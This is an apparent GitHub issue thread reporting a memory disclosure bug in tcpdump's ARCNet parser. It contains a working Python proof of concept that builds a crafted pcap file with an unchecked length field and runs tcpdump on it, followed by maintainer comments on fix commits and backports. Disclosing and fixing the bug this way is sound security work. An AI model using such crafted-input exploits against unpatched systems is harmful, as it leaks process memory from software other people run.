### ISSUE TITLE
Memory disclosure in ARCNet parser

### ISSUE THREAD

**Issue by hugsy** [the-tcpdump-group/tcpdump#419]
In _print-arcnet.c_, function `arcnet_encap_print()` fails to validate that the size read from the packet is lower or equal to the captured data length. Consequently, providing an arbitrary big length, _tcpdump_ will leak the process memory.

The following PoC can be used the reproduce the bug.

```python
#
# tcpdump ARCNet memory disclosure PoC
#
import struct, os

def pcap_header():
    header = struct.pack("<I", 0xA1B2C3D4)
    header+= struct.pack("<I", 0x00400002)
    header+= struct.pack("<I", 0xed001600)
    header+= struct.pack("<I", 0x00)
    header+= struct.pack("<I", 0x20)
    return header

def arcnet_leak():
    # network type
    d= struct.pack("<I", 0x81)

    # packet header
    d+= struct.pack("<I", 0x00)
    d+= struct.pack("<I", 0x00ff)
    d+= struct.pack("<I", 0x0010)

    # ARCNET packet
    d+= struct.pack("<I", 0x1000) # this field is unchecked by tcpdump
    d+= struct.pack("<I", 0x00000000)
    d+= struct.pack("<I", 0x000000d5)
    d+= "A" * 92 # junk

    return d

with open("/tmp/out.pcap", "wb") as f:
    boom = pcap_header() + arcnet_leak()
    f.write(boom)

os.execvpe("/usr/sbin/tcpdump", ["tcpdump", "-r", "/tmp/out.pcap"], {})
```

This issue was tested on the latest stable tcpdump 4.6.2.

**Comment by guyharris** [comment]
Fixed in 4ac72261ee255b36a0f0117dfef10801be6659dd.  I'll backport that to the older branches for the benefit of, for example, "enterprise" Linux distributions where commonly-used versions are still running crufty old versions of various programs.

**Comment by guyharris** [comment]
That fix is already in the 4.6 branch, although it was cherry-picked to the branch after 4.6.2.  I'll backport it further.

**Comment by guyharris** [comment]
Some additional issues were fixed in b4498d5ab7a6dc5702084fb8a1274ce85a798cb6, backported to the 4.1 through 4.6 branches.
